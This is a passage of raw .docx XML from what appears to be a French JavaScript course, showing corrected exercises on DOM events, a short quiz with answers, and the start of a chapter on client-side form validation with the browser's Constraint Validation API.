        <w:t>Exercice 27.3 — Optimiser un gestionnaire de défilement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   PERFORMANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un en-tête change d'apparence au défilement et saccade.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 xml:space="preserve">Limitez les appels avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requestAnimationFrame</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>passive: true</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Mesurez avant et après dans l'onglet Performance.</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27.1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const bouton = document.querySelector("#menu-bouton");</w:t>
        <w:br/>
        <w:t>const liste = document.querySelector("#menu-liste");</w:t>
        <w:br/>
        <w:br/>
        <w:t>function ouvrir() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.setAttribute("aria-expanded", "true");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.hidden = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.querySelector("a")?.focus();</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>function fermer() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.setAttribute("aria-expanded", "false");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.hidden = true;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.focus();</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.getAttribute("aria-expanded") === "true" ? fermer() : ouvrir();</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>liste.addEventListener("keydown", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (e.key === "Escape") fermer();</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>document.addEventListener("click", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!liste.hidden &amp;&amp; !e.target.closest(".menu")) fermer();</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le focus se déplace dans la liste à l'ouverture, ce qui permet la navigation au clavier sans Tab supplémentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le clic à l'extérieur ferme le menu, comportement attendu par tous les utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 27.2</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liste.addEventListener("click", (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const bouton = event.target.closest("[data-supprimer]");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!bouton) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.closest("li").remove();</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Ajout ultérieur : fonctionne sans nouvel écouteur</w:t>
        <w:br/>
        <w:t>const li = document.createElement("li");</w:t>
        <w:br/>
        <w:t>li.innerHTML = '&lt;span&gt;Tâche&lt;/span&gt; &lt;button data-supprimer&gt;Supprimer&lt;/button&gt;';</w:t>
        <w:br/>
        <w:t>liste.append(li);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'écouteur sur le parent reçoit les clics de tous les enfants, présents ou futurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>closest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remonte depuis le bouton jusqu'à la tâche concernée, même si le clic porte sur une icône interne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 27.3</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let enAttente = false;</w:t>
        <w:br/>
        <w:t>window.addEventListener("scroll", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (enAttente) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  enAttente = true;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requestAnimationFrame(() =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    document.body.classList.toggle("entete-compact", window.scrollY &gt; 40);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    enAttente = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}, { passive: true });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sans limitation, l'événement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se déclenche des dizaines de fois par seconde et chaque appel force un recalcul.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requestAnimationFrame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aligne le traitement sur le rafraîchissement de l'écran ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>passive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite d'attendre le script pour défiler.</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Quelle option limite un écouteur à une seule exécution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once: true</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single: true</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capture: true</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passive: true</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Sur quelle phase repose la délégation d'événements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La capture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 bouillonnement</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La cible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Aucune</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Quel événement écouter pour intercepter l'envoi d'un formulaire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click</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submit</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change</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input</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{ passive: true }</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Empêche le déclenchement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 xml:space="preserve">Indique qu'on n'appellera pas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>preventDefault</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Capture l'événement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Limite la fréquence</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Pourquoi retirer un écouteur lors du démontage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Pour accélérer le rendu</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Pour éviter une fuite mémoire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Pour réinitialiser l'état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Ce n'est pas nécessaire</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A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> retire automatiquement l'écouteur après le premier déclenchement.</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L'événement remonte de la cible vers la racine, ce qui permet à un parent de l'intercepter.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se déclenche quel que soit le moyen d'envoi, clic ou touche Entrée.</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Le navigateur peut alors traiter le défilement sans attendre le script.</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Un écouteur qui référence un élément supprimé empêche sa libération et peut se déclencher sur des données obsolètes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>28. Formulaires et validation côté client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Guider la saisie, signaler les erreurs au bon moment et ne jamais perdre le travail de l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 27</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Valider avec l'API de contrainte du navigateur.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Écrire des messages d'erreur personnalisés et accessibles.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Envoyer un formulaire sans rechargement de page.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Gérer les états de chargement, de succès et d'échec.</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Préserver les données saisies en cas d'erreur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>28.1 L'API de contrainte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chaque champ expose un objet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>validity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui décrit précisément ce qui ne va pas : valeur manquante, format incorrect, longueur insuffisante. C'est la base d'une validation fiable sans réinventer les règles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Ce que le navigateur sait déjà vérifier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const champ = document.querySelector("#courriel");</w:t>
        <w:br/>
        <w:br/>
        <w:t>champ.validity.valid          // tout va bien ?</w:t>
        <w:br/>
        <w:t>champ.validity.valueMissing   // required non rempli</w:t>
        <w:br/>
        <w:t>champ.validity.typeMismatch   // email mal formé</w:t>
        <w:br/>
        <w:t>champ.validity.tooShort       // minlength non atteint</w:t>
        <w:br/>
        <w:t>champ.validity.patternMismatch</w:t>
        <w:br/>
        <w:t>champ.validationMessage       // message natif du navigateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.87 — Sept attributs et la contrainte correspondante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37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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Contrainte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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 xml:space="preserve">Propriété de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>validity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Champ obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>valueMissing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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type=email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Format d'adresse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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typeMismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>minlength</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Longueur minimale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tooShort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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maxlength</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Longueur maximale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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tooLong</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Expression régulière</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patternMismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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min</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Bornes numériques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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rangeUnderflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rangeOverflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas d'incrément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stepMismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La validation native, en trois lignes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formulaire.addEventListener("submit", (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!formulaire.checkValidity()) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    formulaire.reportValidity();   // affiche les messages natifs</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>28.2 Messages personnalisés</w:t>
      </w:r>
